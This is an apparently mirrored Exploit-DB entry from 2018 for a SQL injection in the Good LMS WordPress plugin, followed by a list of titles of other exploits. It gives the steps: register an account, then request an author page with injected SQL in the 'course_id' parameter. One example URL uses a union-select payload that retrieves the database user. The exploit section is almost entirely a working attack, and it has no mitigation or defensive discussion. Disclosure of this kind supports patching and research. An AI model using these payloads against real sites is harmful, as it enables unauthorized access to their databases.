WordPress Plugin Learning Management System – ‘course_id’ SQL Injection

Exploit Database
13 阅读

作者： Esecurity.ir

日期： 2018-01-26
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/43901/

# Exploit Title: Good LMS - Learning Management System WP Plugin SQL 
Injection
# Date: 2018-01-24
# Exploit Author: Esecurity.ir
# Exploit Author Web Site: http://esecurity.ir
# Special Thanks : Meisam Monsef [meisamrce@gmail.com] - Telegram ID : 
@meisamrce
# Vendor Homepage: https://goodlayers.com/
# Version: All Version

Exploit :

	1 - First enter the link below and create an account
	http://target.com/?register=1
	2 - the exploit
	http://target.com/author/[your-username]/?type=scoring-status-student&course_id=-999999+[SQL+Command]%23
	http://target.com/author/[your-username]/?type=scoring-status-student&course_id=-999999+union+select+1,2,3,user()%23

last Exploits
WordPress Plugin Learning Management System – ‘course_id’ SQL Injection的更多信息

Cachelogic Expired Domains Script 1.0 – Multiple Vulnerabilities：
DornCMS Application 1.4 – Multiple Web Vulnerabilities：
Achievo 1.4.3 – Multiple Web Vulnerabilities：
Joomla! Component Search 3.0.0 – SQL Injection：
Wing FTP Server Admin 4.4.5 – Multiple Vulnerabilities：
WordPress Theme Newspaper 6.7.1 – Privilege Escalation：
BlaB! Lite 0.5 – Remote File Inclusion：
up.time 7.5.0 – Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)：